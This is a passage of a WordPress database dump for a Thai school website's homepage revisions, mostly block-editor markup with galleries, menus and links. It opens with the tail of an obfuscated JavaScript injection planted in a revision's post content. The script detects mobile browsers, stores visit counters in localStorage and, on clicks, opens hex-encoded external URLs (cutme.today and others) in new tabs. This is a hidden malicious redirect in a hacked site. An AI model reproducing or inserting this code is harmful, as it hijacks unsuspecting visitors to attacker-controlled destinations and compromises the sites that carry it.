_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:50:28','2024-08-07 14:50:28','',14,'http://pakhaeng.ssk.in.th/?p=672',0,'revision','',0),
(673,1,'2024-08-07 21:51:10','2024-08-07 14:51:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":200,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 